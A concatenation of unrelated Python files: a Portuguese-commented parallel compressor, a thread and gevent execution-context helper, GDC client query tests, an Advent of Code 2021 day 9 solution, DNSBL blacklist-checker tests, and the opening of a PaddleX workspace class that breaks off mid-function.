pid[iterator] = os.getpid()
else:
print "O ficheiro", File, "não existe." # Se nao exister, avisa o utilizador
errorChecker.value = 1 # Ha erro e a flag atualiza
def sigint_handler(sig, NULL):
"""
Handler de sinal de SO SIGINT para terminar a execucao
"""
errorChecker.value = 2 # Faz com que parem de processar ficheiros
def sigalrm_handler(sig, NULL):
"""
Handler de sinal de SO SIGALRM que imprime o estado do programa
"""
print "Foram", ("comprimidos" if mode == 'c' else "descomprimidos"), \
str(totalFiles.value), "ficheiros."
print "Foram", ("comprimidos" if mode == 'c' else "descomprimidos"), \
str(volume.value / 1024), "Kb de ficheiros"
print "Tempo de execucao:", (time.time() - timer) * 1000
def log_writer(files, date, end_timer, pid, names, sizes, times, f):
"""
Escreve um ficheiro log binario com os estados da execucao do programa
Requires: self object
Ensures: A escrita de um ficheiro binario log
"""
status = []
for i in range(len(files)):
if pid[i] != 0:
status.append([pid[i], names[i], sizes[i], times[i]])
with open(f, "wb") as fw:
for num in [date.day, date.month, date.year, date.hour,
date.minute, date.second, date.microsecond]:
fw.write(struct.pack("i", num)) # Escrever a data de comeco
fw.write(struct.pack("d", end_timer)) # Escrever data do fim
for stat in status:
# Para cada ficheiro e' escrito na memoria sequencialmente
size = len(bytes(stat[1]))
fw.write(struct.pack("i", stat[0])) # pid do processo que trabalho no ficheiro
fw.write(struct.pack("i", size))
fw.write(struct.pack("%ds" % size, stat[1])) # Nome do ficheiro
fw.write(struct.pack("i", stat[2])) # Tamanho do ficheiro apos
fw.write(struct.pack("d", stat[3])) # Tempo que demorou a comprimir/descomprimir
def main(args, timer):
files = args.files
t = args.t
f = args.f
date = datetime.datetime.now()
names = (None if f is None else Array(c_char_p, len(files))) # self.names, sizes e times sao usados como listas de informacao para se tiver que escrever
sizes = (None if f is None else Array("i", len(files))) # o ficheiro binario
times = (None if f is None else Array("d", len(files)))
pid = (None if f is None else Array("i", len(files)))
signal.signal(signal.SIGINT, sigint_handler) # SIGINT (CTRL^C) para terminar a execucao do programa
if args.a is not None:
signal.signal(signal.SIGALRM, sigalrm_handler) # Handler do sinal
signal.setitimer(signal.ITIMER_REAL, 1, args.a) # Timer, a cada 'a' segundos envia um sinal SIGALRM q e apanhado
processos = [Process(target=handle_files, args=(files, t, f, names, times, sizes, pid)) for _
in range((args.parallel[0] if args.parallel[0] <= len(files) else len(files)))]
for i in range(len(processos)):
processos[i].start()
for i in range(len(processos)):
processos[i].join()
end_timer = time.time() - timer
if f is not None:
log_writer(files, date, end_timer, pid, names, sizes, times, f)
print "Foram", ("comprimidos" if mode == 'c' else "descomprimidos"), str(totalFiles.value), "ficheiros."
print "Foram", ("comprimidos" if mode == 'c' else "descomprimidos"), str(volume.value / 1024), \
"Kb de ficheiros"
print "Tempo de execucao:", end_timer
"""
Argparse e' usado para fazer parsing dos argumentos da linha de comando.
"""
timer = time.time()
description = 'Comprime e descomprime conjuntos de ficheiros paralelamente'
parser = argparse.ArgumentParser(description=description)
group = parser.add_mutually_exclusive_group(required=True) # Grupo exclusivo para -c ou -d (zip ou unzip)
group.add_argument("-c", dest="mode", help="Comprimir ficheiros", action="store_const", const="c")
group.add_argument("-d", dest="mode", help="Descomprimir ficheiros", action="store_const", const="d")
parser.add_argument("-p", metavar="processes", dest="parallel", help="Numero de processos permitidos", type=int,
nargs=1, default=[1])
parser.add_argument("-t", dest="t", help="Obriga a suspensao de execucao caso um ficheiro seja "
"nao existente", action="store_true") # True or false para modo t
parser.add_argument("-a", dest="a", help="Escreve o estado da execucao a cada intervalo de tempo "
"indicado", type=int)
parser.add_argument("-f", dest="f", help="Guardar o histórico da execucao do programa num ficheiro binario indicado"
, type=str)
parser.add_argument("files", type=str, metavar="files", nargs="*", help="Ficheiros para comprimir/descomprimir")
args = parser.parse_args()
if not args.files and not sys.stdin.isatty():
# stdin.isatty retorna False se houver algo no stdin, ou seja, pzip -c|-d < ficheiro.txt
args.files = filter(lambda x: x != '', sys.stdin.read().split("\n"))
elif not args.files and sys.stdin.isatty():
# Se nao tiver algo no stdin e nao for especificado ficheiros, perguntar ao utilizador
args.files = filter(lambda x: x != '', sys.stdin.read().split("\n"))
if args.parallel[0] <= 0:
parser.error("Tem de criar 1 ou mais processos")
mode = args.mode
main(args, timer)
|
execution_context.py
|
import abc
import threading
import six
@six.add_metaclass(abc.ABCMeta)
class ExecutionContext(object):
"""Base abstract execution context class."""
@abc.abstractmethod
def run(self, func, *args, **kwargs):
pass
class GeventExecutionContext(ExecutionContext):
"""Execution context that run background function as a Greenlet.
gevent monkey patching must be done by user.
"""
def run(self, func, *args, **kwargs):
"""Run given function in a Greenlet."""
import gevent
gevent.spawn(func, *args, **kwargs)
gevent.sleep()
class ThreadingExecutionContext(ExecutionContext):
"""Execution context that run background function as a OS Thread."""
def run(self, func, *args, **kwargs):
"""Run given function in a daemon OS thread."""
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
|
test_query.py
|
import time
from multiprocessing import Process
from unittest import TestCase
import pytest
from gdc_client.parcel.const import HTTP_CHUNK_SIZE
import mock_server
from conftest import uuids
from gdc_client.query.index import GDCIndexClient
from gdc_client.query.versions import _chunk_list, get_latest_versions
# default values for flask
server_host = "http://127.0.0.1"
server_port = "5000"
# same as --server flag for gdc-client
base_url = server_host + ":" + server_port
class QueryIndexTest(TestCase):
def setUp(self):
self.server = Process(target=mock_server.app.run)
self.server.start()
# give the server time to start
time.sleep(2)
def tearDown(self):
self.server.terminate()
############ not set ############
def test_no_metadata_get_related_files(self):
index = GDCIndexClient(uri=base_url)
results = index.get_related_files("small")
assert results == []
def test_no_metadata_get_annotations(self):
index = GDCIndexClient(uri=base_url)
results = index.get_annotations("small")
assert results == []
def test_no_metadata_get_md5sum(self):
index = GDCIndexClient(uri=base_url)
results = index.get_md5sum("small")
assert results == None
def test_no_metadata_get_filesize(self):
index = GDCIndexClient(uri=base_url)
results = index.get_filesize("small")
assert results == None
def test_no_metadata_get_filesize(self):
index = GDCIndexClient(uri=base_url)
results = index.get_access("small")
assert results == None
############ mock metadata ############
def test_full_mock_get_metadata(self):
index = GDCIndexClient(uri=base_url)
index._get_metadata(["small"])
assert index.get_access("small") == uuids["small"]["access"]
assert index.get_filesize("small") == uuids["small"]["file_size"]
assert index.get_md5sum("small") == uuids["small"]["md5sum"]
assert index.get_related_files("small") == uuids["small"]["related_files"]
assert index.get_annotations("small") == uuids["small"]["annotations"]
def test_no_rel_no_ann_mock_get_metadata(self):
index = GDCIndexClient(uri=base_url)
index._get_metadata(["small_no_friends"])
assert (
index.get_access("small_no_friends") == uuids["small_no_friends"]["access"]
)
assert (
index.get_filesize("small_no_friends")
== uuids["small_no_friends"]["file_size"]
)
assert (
index.get_md5sum("small_no_friends") == uuids["small_no_friends"]["md5sum"]
)
assert index.get_related_files("small_no_friends") == []
assert index.get_annotations("small_no_friends") == []
def test_ann_mock_get_metadata(self):
index = GDCIndexClient(uri=base_url)
index._get_metadata(["small_ann"])
assert index.get_access("small_ann") == uuids["small_ann"]["access"]
assert index.get_filesize("small_ann") == uuids["small_ann"]["file_size"]
assert index.get_md5sum("small_ann") == uuids["small_ann"]["md5sum"]
assert index.get_related_files("small_ann") == []
assert index.get_annotations("small_ann") == uuids["small_ann"]["annotations"]
def test_rel_mock_get_metadata(self):
index = GDCIndexClient(uri=base_url)
index._get_metadata(["small_rel"])
assert index.get_access("small_rel") == uuids["small_rel"]["access"]
assert index.get_filesize("small_rel") == uuids["small_rel"]["file_size"]
assert index.get_md5sum("small_rel") == uuids["small_rel"]["md5sum"]
assert (
index.get_related_files("small_rel") == uuids["small_rel"]["related_files"]
)
assert index.get_annotations("small_rel") == []
############ mock separate small files (smalls) ############
def test_small_full_separate_small_files(self):
""" Currently if a file has related or annotation files
the dtt processes it as if it were a big file so that
it goes through the old method of downloading,
regardless of size.
NOTE: This will probably change in the future.
"""
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(["small"], HTTP_CHUNK_SIZE)
assert index.get_access("small") == uuids["small"]["access"]
assert index.get_filesize("small") == uuids["small"]["file_size"]
assert index.get_md5sum("small") == uuids["small"]["md5sum"]
assert index.get_related_files("small") == uuids["small"]["related_files"]
assert index.get_annotations("small") == uuids["small"]["annotations"]
assert bigs == ["small"]
assert smalls == []
def test_small_no_rel_no_ann_separate_small_files(self):
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(["small_no_friends"], HTTP_CHUNK_SIZE)
assert (
index.get_access("small_no_friends") == uuids["small_no_friends"]["access"]
)
assert (
index.get_filesize("small_no_friends")
== uuids["small_no_friends"]["file_size"]
)
assert (
index.get_md5sum("small_no_friends") == uuids["small_no_friends"]["md5sum"]
)
assert index.get_related_files("small_no_friends") == []
assert index.get_annotations("small_no_friends") == []
assert bigs == []
assert smalls == [["small_no_friends"]]
def test_small_invalid_separate_small_files(self):
""" If no metadata can be found about a file, attempt a
download using the big file method
"""
invalid = "invalid uuid"
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files([invalid], HTTP_CHUNK_SIZE)
assert index.get_access(invalid) == None
assert index.get_filesize(invalid) == None
assert index.get_md5sum(invalid) == None
assert index.get_related_files(invalid) == []
assert index.get_annotations(invalid) == []
assert bigs == [invalid]
assert smalls == []
############ mock separate small files (bigs) ############
def test_big_full_separate_small_files(self):
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(["big"], HTTP_CHUNK_SIZE)
assert index.get_access("big") == uuids["big"]["access"]
assert index.get_filesize("big") == uuids["big"]["file_size"]
assert index.get_md5sum("big") == uuids["big"]["md5sum"]
assert index.get_related_files("big") == uuids["big"]["related_files"]
assert index.get_annotations("big") == uuids["big"]["annotations"]
assert bigs == ["big"]
assert smalls == []
############ mock separate small files (bigs) ############
def test_big_and_small_full_separate_small_files(self):
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(["big", "small"], HTTP_CHUNK_SIZE)
assert index.get_access("big") == uuids["big"]["access"]
assert index.get_filesize("big") == uuids["big"]["file_size"]
assert index.get_md5sum("big") == uuids["big"]["md5sum"]
assert index.get_related_files("big") == uuids["big"]["related_files"]
assert index.get_annotations("big") == uuids["big"]["annotations"]
assert index.get_access("small") == uuids["small"]["access"]
assert index.get_filesize("small") == uuids["small"]["file_size"]
assert index.get_md5sum("small") == uuids["small"]["md5sum"]
assert index.get_related_files("small") == uuids["small"]["related_files"]
assert index.get_annotations("small") == uuids["small"]["annotations"]
# if a uuid has related files or annotations then they
# are downloaded as big files
assert set(bigs) == set(["big", "small"])
assert smalls == []
def test_big_and_small_no_rel_no_ann_separate_small_files(self):
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(
["big_no_friends", "small_no_friends"], HTTP_CHUNK_SIZE
)
assert index.get_access("big_no_friends") == uuids["big_no_friends"]["access"]
assert (
index.get_filesize("big_no_friends") == uuids["big_no_friends"]["file_size"]
)
assert index.get_md5sum("big_no_friends") == uuids["big_no_friends"]["md5sum"]
assert index.get_related_files("big_no_friends") == []
assert index.get_annotations("big_no_friends") == []
assert (
index.get_access("small_no_friends") == uuids["small_no_friends"]["access"]
)
assert (
index.get_filesize("small_no_friends")
== uuids["small_no_friends"]["file_size"]
)
assert (
index.get_md5sum("small_no_friends") == uuids["small_no_friends"]["md5sum"]
)
assert index.get_related_files("small_no_friends") == []
assert index.get_annotations("small_no_friends") == []
assert bigs == ["big_no_friends"]
assert smalls == [["small_no_friends"]]
@pytest.mark.parametrize("case", [range(1), range(499), range(500), range(1000),])
def test_chunk_list(case):
for chunk in _chunk_list(case):
assert len(chunk) <= 500
@pytest.mark.parametrize(
"ids, latest_ids, expected",
[
(["foo", "bar"], ["foo", "baz"], {"foo": "foo", "bar": "baz"}),
(["1", "2", "3"], ["a", "b", "c"], {"1": "a", "2": "b", "3": "c"}),
(["1", "2", "3"], ["a", "b", None], {"1": "a", "2": "b", "3": "3"}),
],
)
def test_get_latest_versions(versions_response, ids, latest_ids, expected):
url = "https://example.com"
versions_response(url + "/files/versions", ids, latest_ids)
result = get_latest_versions(url, ids)
assert result == expected
|
day9.py
|
#https://adventofcode.com/2021/day/1
import copy
from bisect import bisect_left
import re, os, sys
from itertools import chain
import math
from typing import DefaultDict, final
import time
from collections import Counter, defaultdict
from threading import Thread, Lock
input2="""9897656789865467895698765469899988672134598894345689864101378965457932349943210987654789653198789434
8789542499996878954329984398789976561012987789245678953212567892345791998899329899765678969997668912
7678943978987989965998993297649875432129876567956789864487678991056899877778939769886789998766457899
4578999868998996899867894976532986543299876476897899987569899989167898766567898654998898998655345678
2456987657679535679756799988643498657987654345789978899789998878998919954349997543219967987543237889
1234896545568986798645678999754989767898765456998769759899987765789329863238898659301256798793156891
2346789432379997987434689489899879898919876567899954346998796434678997642127789798512345989989247892
8756894210998989876545694378987868999101998688999863238987684323457789751015678987654459878678956994
9769995679876978998656789469876957893212999899989764649876576212345678953223489698866598754567897989
9878989989885467899787896598765648789329876959879986768985432101567789998654599549977987543468998978
3989879897654345689998998679954324595498754347669897979699564323459998949765678923989295432389989567
2997669789731287899899649799878212989987543233456789897598765434569767959878789313993197643578965456
9876548678954345997678998998965359878995432102345898795439896556978956899989895429894298754567989967
9754334567895456789567987897895498769896654233457987689649987667989349989999976598789349865678999898
8843212689986687993479876756789987656789999354569698789798998798996498679889988987679459996989239799
7654303568987798932349965345690976543245878965689459899987899899459987598679299998598998989993198677
9965214589298999421298764234892987632124567899893234999896757996598796476599101976467987979954989556
9876423499349988942359982123899876543012568998990123598765346989987654323478919765359896868899876434
9987834568959876899494321015789987654423458987781349987544235677898773212467899854298795756799764323
8798945679998975697985432123456799797634567896532398765432136456987654543588978975697654345878954212
6569987989897854586976543434589899898765778999994569976543012345699896698678967896989543234667994334
4323599999765632324989876565678935999876889998789678998652134456789998789789656799976532123456789765
3212678998654321012497987676799323497989996897678989998543445967997659899895346898798943434678999876
5323799998776432423456798989893214986797965986599999897654597888976545998921234987659975665789875987
5435678989886543434567899699954399865456797998989999798975679999987631987654345799543986796789653498
6547899767987656756778985467895987654357789219878797549986998921299890198765489898752397898997621359
7656999348999987897899876579999898983234679109767689920199887990123989989987568999643498959876533578
9767898769987899998986988989987689876123793298656577891298796789939878976597679998759979347987897689
0978999898776878999765399999976467965234999987545456792987665667898769897498989899898765456899989797
1999686999654767897654239899897379894349898765432345789876543456789456789329595789999876567988778965
9765534498743456899761098756789298789498789877521234568997431367890239899939424699998997879876567893
7654321239654569989943199645678999688997678988432345789789545689965498999898935988977898989865438942
8969210149875698779899986432349997567789499996544656795678957897896987898767899976756779995987546891
9898991268989987667678964321259986455679989987655767893567898956989876987656998765634567894398656789
8796989357899986554567893210198998234598776498789878912379939347978945698768987654323979976498787891
7645678968999975423589999321297986123987654339891989701588921299866734569979498962109898997569898910
8958789989998764312399998432986544016799543210910196532347893987654321368989329879298787898978929921
9769896599987655503457897553497432135698765432399987648656789499965873456993210998987656789989939892
7978965439876543217568998664987643446999876543478999759867892349876754567894329987542545691299899789
6989753212987654328678959989999987556899997664567899867999943458987876989965998765431236789498788678
5699975423498765449789543498965398698998998789678934979878956567998989990299879976742347999998679456
4579896534569896559895432346794298789877899898789013598867897678999998989987667988755458949876542367
3456798695678998678976544756891019899965789929992129987756789789787987867896545699766569439998956459
2348989989789989989987656897893434998754599545943298985645689897656986745899656899898678998989998567
1459879878999876592198987898964565989853678987894987674434568999749875434668968965929789987878987678
2598764267899986432019899999995679876542357998976986543223478998767976323456899654319898875468998989
4599879456789997543198778999989798764321345899989987664101249019879765414597968943101997654345989991
5988998968899898994987656789878999986430156789998698876832389323989986205689547894312987643234678990
9876987899976789789998767898765798765321269899876569997844678999999854319893236789323498753012399989
9754996899764244678959878999874859896442345789754323459998799878998765623989125899976569872123459878
9899875798943123579543999986543236987554567997654314368999892367899876754578934999898698943934569965
2987654987892013468932123499432125697665678999542101267987921257943988896679765698789987899895798754
3986543456794254778921019998954014598779799798653212346795210146792999987989879987679996989789987653
9875432345895345679543198787943123459989895698764423557984321235699765498999989876498785667679876542
2976983466795457799765987656964236598992924579876534989875432545989876329568996985349653446578987321
0989876567896768899876899767895347987891013468987975678987643459879998213467895695498742323459765435
1996997678998879989989999898976459876789123569098987789699776598765432109598996986569871015568977656
9875789789459989778999987999987598785468997679129898994566987679886545298989987897698762123459988767
8754679890345697669999875798998698654345689789234789543455799789998667987879998959797654255678999878
7543467991246789556987654567899899773298789896545678962434699898989879896567899539898765345689999989
8932345789757894345699765698932999974349899987858789910123988937678999765457895410999876789789898899
6521234599767892123469896989321298765999969998769897891239876723478998964346896321299987899895687799
7434345678978943014598989878935679976789458919878956792349765212567996654235789434989298965934545678
6545456989989432123987678967956789297992346901989545989998754201789875743124589665679129654321234569
7757567899997544539998789656897895498976469899895439877839765329899754321012678998798998765432345678
8767779987987656678929893245789999989899598765789921965321965445698765532343489999987769887674689799
9988989996598879789537942126897678976788987644686899975432987566789989763456789899876653998765678999
3299398965439998996545693437956569865567898632345678976545699978993599854667896798765432109876799989
2101267897546987898756989548943497654456789543956789597656901989432398765678945989997543212989899879
4212356998969996789899878959542349873247899859897894498969893496741349876789239876987655344599999868
5434567899198865567989759894321998989356798769799942349898789595432345987892123985498965455678998659
9656678999097654459878547789499876599967899998678921298797679987549976798999012494309876567789999543
8997889898998543267965436689987985439878999876567890987654598998998798999998923989212987679899898932
7789998757987653129754324578965699210989998765457991299843467899897689895987899878964598789999787893
5679987649876543019895412399954598462398999874346789987652359998786576794986799767895789894299696794
4599876434987432123976543467893497654457890975487995699764467986531345689765987656999899999987575989
5789864329876554994987674578932398765689932976699954349865879598765456899854399769899989998765464578
6899985410997689789098789689321539878789993987789893239878989459976567998743210998799979889954323567
7999878324989798679299898795430123989896789998995789145989991345987678999654321297698665767895434579
8998765439878986598987959896542234599945689879434679245996892399898889498766532976569543556789875699
9999897699765434497896545987665465689767898965323478959854953987679994349877659876398932346895986988
9987998987654323356799536599879878899899987899212367998743899876567895457999878985497893767994299877
9876599998763201245678923478989989954999976778923456987632788975479986679987989799986989899989198766
5987988998775412367889214567896597899889895567894599876543567987569997899976495698775778999878997654
4699867997654323989995323779943456999778794345965989987654578998678989929894334597664667898769876543
3798755798976437899976534589432239876665689459899878698786689989989678919789219987543558789656989632
2979843459987656789997849789540198765534569598798766539899789976594569998677998765432345678932398721
9867552345998768898989998997421999854323878997659854321998998895423998976566789879643458789210987210
8954431236899879967678987996539899965534989654339767320987896796579887895465678988756669895329976521
7643210348965989654589456789659799876645678962123988649875435989998756789324789999898779976498765434
8754325459954399767894345678998678997786899894235698798994323577899645678939899998969889876599886745
9765486567893239898976212799876567899897956789986789987432101456797434578998987897653999987689999656
9877578678975699999697434987656456999989345699998992196544312345976547689977476789542458998792498767
4988989789989789996598645998642345998765456789879019987665443767897658798765324567943567899891239978
3499599899998998989999799876321245789876567899865198798986556898998767987643213479957679935942997989
2323456989877987579899989765433357894998679989764398659397698949899979998765424567898997645699876598
1012369973256996456789964987655478943249789678965499543229899538789998769986535899999698759989765467
2123498764139865323898753599877699761029896567896987642109954324567898754398876789996549898768954356
4234599753019973210987654568989789732234989478998998764398765313456998673219998899875435999857895967
5346987542198765423499868679999897654345678989219239875987654324769876543101239912954323498767976879"""
input1="""2199943210
3987894921
9856789892
8767896789
9899965678"""
class my_logger:
def __init__(self) -> None:
self._logfile=open('./2021/'+os.path.basename(sys.argv[0])+'.log.txt','w+')
self._logfilemutex=Lock()
def write(self, line):
if not self._enable:
return
self._logfilemutex.acquire()
try:
self._logfile.write(line)
finally:
self._logfilemutex.release()
def __del__(self) -> None:
self._logfile.close()
def enable(self, e):
self._enable=e
global_logger=my_logger()
global_logger.enable(False)
class ThreadSafeData:
def __init__(self, data) -> None:
self._data=data
self._mutex=Lock()
def append(self, d):
self._mutex.acquire()
try:
self._data.append(d)
finally:
self._mutex.release()
def get_copy(self):
return_data=None
self._mutex.acquire()
try:
return_data=copy.deepcopy(self._data)
finally:
self._mutex.release()
return return_data
class WinException(BaseException):
pass
class ErrorException(BaseException):
pass
class point:
def __init__(self,x,y) -> None:
self.x=x
self.y=y
class line:
def __init__(self,coordinates) -> None:
self.point1 = point(coordinates[0], coordinates[1])
self.point2 = point(coordinates[2], coordinates[3])
def get_line_points_hor_vert(self):
# Bresenham algorithm
number_of_points=max(abs(self.point1.x - self.point2.x), abs(self.point1.y-self.point2.y))
number_of_points-=1 # adjust for end points
x_spacing=(self.point2.x-self.point1.x)/(number_of_points+1)
y_spacing=(self.point2.y-self.point1.y)/(number_of_points+1)
return [self.point1] + [point(self.point1.x + i * x_spacing, self.point1.y + i * y_spacing) for i in range(1, number_of_points+1)] + [self.point2]
class MyThread:
def __init__(self, t, mut) -> None:
self._thread=t
self._mutex=mut
def get_key(dict1, value):
for k,v in dict1.items():
if v==value:
return k
return None
def get_keys_from_len_of_key(dict1, length):
keys=[]
for k,v in dict1.items():
if len(k)==length:
keys.append(k)
return keys
def get_keys_from_len_of_value(dict1, length):
keys=[]
for k,v in dict1.items():
if len(v)==length:
keys.append(k)
return keys
def get_keys_from_value(dict1, value):
keys=[]
for k,v in dict1.items():
if v==value:
keys.append(k)
return keys
def has_all_chars(input_string, string2):
for s in string2:
if s not in input_string:
return False
return True
def get_all_indices_of_element(list1,element):
final_list=[]
for i in range(len(list1)):
if list1[i]==element:
final_list.append(i)
return final_list
#####################################################################################
lines = input1.split('\n')
lines = input2.split('\n')
def funca(lines):
low_points=[]
sum_value=0
for line in lines:
row=lines.index(line)
input=list(map(int, list(line)))
# go from smaller number to bigger until 8. there is no way 9 can be lowest point
for i in range(9):
try:
for col in get_all_indices_of_element(input, i):
lowest=i
for xdir in [c for c in [row-1, row+1] if c>=0 and c<len(lines)]:
if int(lines[xdir][col])<=i:
lowest=-1
break
if lowest>=0:
for cdir in [c for c in [col-1, col+1] if c>=0 and c<len(input)]:
if int(line[cdir])<=i:
lowest=-1
break
if lowest>=0:
sum_value+=lowest+1
low_points.append((row,col))
except Exception as e:
pass
print('a',sum_value)
return low_points
start=time.time()
funca(lines)
print('time',time.time()-start)
# correct ans: 607
def move_dir(lines, start_point, xinc, yinc, main_list):
prev_point=lines[start_point[0]][start_point[1]]
x=start_point[0]
y=start_point[1]
new_list=[]
while True:
x=x+xinc
y=y+yinc
if x<0 or x>=len(lines) or y<0 or y>=len(lines[0]) or lines[x][y]=='9' or int(lines[x][y])<=int(prev_point):
break
new_list.append((x,y))
prev_point=lines[x][y]
return new_list
def write_to_locked_memory(shared_data, new_data, data_mutex):
data_mutex.acquire()
try:
for p in new_data:
if p not in shared_data:
shared_data.append(p)
finally:
data_mutex.release()
def move_all_dir(low_point, lines, thread_name, main_list, data_mutex):
sub_list=[]
sub_list+=move_dir(lines, low_point, -1, 0, main_list)
sub_list+=move_dir(lines, low_point, +1, 0, main_list)
sub_list+=move_dir(lines, low_point, 0, -1, main_list)
sub_list+=move_dir(lines, low_point, 0, +1, main_list)
write_to_locked_memory(main_list, sub_list, data_mutex)
return sub_list
def thread_branch_basin(low_point, lines, thread_name, main_list, data_mutex):
local_list=move_all_dir(low_point, lines, '', main_list, data_mutex)
global_logger.write(' '.join(['\n\t',thread_name, 'len:', str(len(main_list)), str(main_list)]))
dir_threads=[]
for m in local_list:
dir_threads.append(Thread(target=thread_branch_basin, args=(m, lines, thread_name+'->->'+str(m), main_list, data_mutex)))
for t in dir_threads:
t.start()
for t in dir_threads:
t.join()
# global_logger.write(' '.join(['\n\t', thread_name, 'branch-end-len', str(len(main_list)), str(main_list)]))
def thread_basin(low_point, lines, thread_name, basin_size_list):
main_list=[low_point]
data_mutex=Lock()
thread_branch_basin(low_point, lines, thread_name, main_list, data_mutex)
basin_size_list.append(len(main_list))
start=time.time()
try:
low_points=funca(lines)
# remove basins at the corners because they can never be big ones.
smaller_basin_points=[]
for p in low_points:
if p[0]==0 or p[0]==len(lines)-1 or p[1]==0 or p[1]==len(lines[0])-1:
smaller_basin_points.append(p)
low_points=list(set(low_points) - set(smaller_basin_points))
basin_size_list=ThreadSafeData([])
threads=[]
for p in low_points:
t=Thread(target=thread_basin, args=(p, lines, 'basin_thread-'+str(p), basin_size_list))
t.start()
threads.append(t)
for t in threads:
t.join()
data=basin_size_list.get_copy()
data.sort(reverse=True)
final_ans=1
for i in range(3):
final_ans*=data[i]
print('b', final_ans)
# correct ans: 900864
except ErrorException as e:
print('error')
print('time',time.time()-start)
|
tests.py
|
import asyncio
import threading
import pytest
from .checker import DNSBLChecker, DNSBLIpChecker, DNSBLDomainChecker
from .providers import Provider
# IP TESTS
def test_checker():
checker = DNSBLIpChecker()
res = checker.check('68.128.212.240')
assert res.blacklisted
assert res.categories
assert res.detected_by
results = checker.bulk_check(['68.128.212.240', '8.8.8.8'])
# check bulk check
assert results[0].detected_by == res.detected_by
assert not results[1].blacklisted
def test_checker_ipv6():
checker = DNSBLIpChecker()
res = checker.check('2001:4860:4860::8844')
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
checker = DNSBLIpChecker(providers=[Provider('v6.fullbogons.cymru.com')])
res = checker.check('::1')
assert res.blacklisted
assert res.categories
assert res.detected_by
def test_providers():
""" Providers should not mark google ip as bad """
checker = DNSBLIpChecker()
res = checker.check('8.8.8.8')
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
def test_wrong_ip_format():
misformated_ips = ['abc', '8.8.8.256']
for ip in misformated_ips:
checker = DNSBLIpChecker()
with pytest.raises(ValueError):
checker.check(ip)
# DOMAIN TESTS
def test_domain_checker():
checker = DNSBLDomainChecker()
malicious_domain = 'dbltest.com'
res = checker.check(malicious_domain)
assert res.blacklisted
assert res.categories
assert res.detected_by
results = checker.bulk_check([malicious_domain, 'google.com'])
# check bulk check
assert results[0].detected_by == res.detected_by
assert not results[1].blacklisted
def test_domain_providers():
""" Domain Providers should not mark google.com as bad """
checker = DNSBLDomainChecker()
res = checker.check('google.com')
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
def test_wrong_domain_format():
misformated_ips = ['abc-', '8.8.8.256', 'bababa']
for ip in misformated_ips:
checker = DNSBLDomainChecker()
with pytest.raises(ValueError):
print(checker.check(ip))
def test_domain_variants():
# capitalized / 3th+ levels, idna
capitalized_domains = ['Google.com', 'дом.рф', 'www.digital.govt.nz']
for domain in capitalized_domains:
checker = DNSBLDomainChecker()
res = checker.check(domain)
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
# Threading tests
def test_main_thread():
result = None
def test():
nonlocal result
checker = DNSBLIpChecker()
result = checker.check('68.128.212.240')
thr = threading.Thread(target=test)
thr.start()
thr.join()
assert result.blacklisted
## COMPAT TESTS
def test_checker_compat_0_6():
checker = DNSBLChecker()
res = checker.check_ip('68.128.212.240')
assert res.blacklisted
assert res.categories
assert res.detected_by
results = checker.check_ips(['68.128.212.240', '8.8.8.8'])
# check bulk check
assert results[0].detected_by == res.detected_by
assert not results[1].blacklisted
def test_providers_compat_0_6():
""" Providers should not mark google ip as bad """
checker = DNSBLChecker()
res = checker.check_ip('8.8.8.8')
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
def test_wrong_ip_format_compat_0_6():
misformated_ips = ['abc', '8.8.8.256']
for ip in misformated_ips:
checker = DNSBLChecker()
with pytest.raises(ValueError):
checker.check_ip(ip)
|
workspace.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import workspace_pb2 as w
from .utils import get_logger
from .dir import *
import os
import os.path as osp
from threading import Thread
import traceback
import platform
import configparser
import time
import shutil
import copy
class Workspace():
def __init__(self, workspace, dirname, logger):
self.workspace = workspace
#self.machine_info = {}
# app init
self.init_app_resource(dirname)
# 当前workspace版本
self.current_version = "0.2.0"
self.logger = logger
# 设置PaddleX的预训练模型下载存储路径
# 设置路径后不会重复下载相同模型
self.load_workspace()
self.stop_running = False
self.sync_thread = self.sync_with_local(interval=2)
#检查硬件环境
#self.check_hardware_env()
def init_app_resource(self, dirname):
self.m_cfgfile = configparser.ConfigParser()
app_conf_file_name = "PaddleX".lower() + ".cfg"
paddlex_cfg_file = os.path.join(PADDLEX_HOME, app_conf_file_name)
try:
self.m_cfgfile.read(paddlex_cfg_file)
except Exception as e:
print("[ERROR] Fail to read {}".format(paddlex_cfg_file))
if not self.m_cfgfile.has_option("USERCFG", "workspacedir"):
self.m_cfgfile.add_section("USERCFG")
self.m_cfgfile.set("USERCFG", "workspacedir", "")
self.m_cfgfile["USERCFG"]["workspacedir"] = dirname
def load_workspace(self):
path = self.workspace.path
newest_file = osp.join(self.workspace.path, 'workspace.newest.pb')
bak_file = osp.join(self.workspace.path, 'workspace.bak.pb')
flag_file = osp.join(self.workspace.path, '.pb.success')
self.workspace.version = self.current_version
try:
if osp.exists(flag_file):
with open(newest_file, 'rb') as f:
self.workspace.ParseFromString(f.read())
elif osp.exists(bak_file):
with open(bak_file, 'rb') as f:
self.workspace.ParseFromString(f.read())
else:
print("it is a new workspace")
except Exception as e:
print(traceback.format_exc())
self.workspace.path = path
if self.workspace.version < "0.2.0":
self.update_workspace()
self.recover_workspace()
def update_workspace(self):
if len(self.workspace.projects) == 0 and len(
self.workspace.datasets) == 0:
self.workspace.version == '0.2.0'
return
for key in self.workspace.datasets:
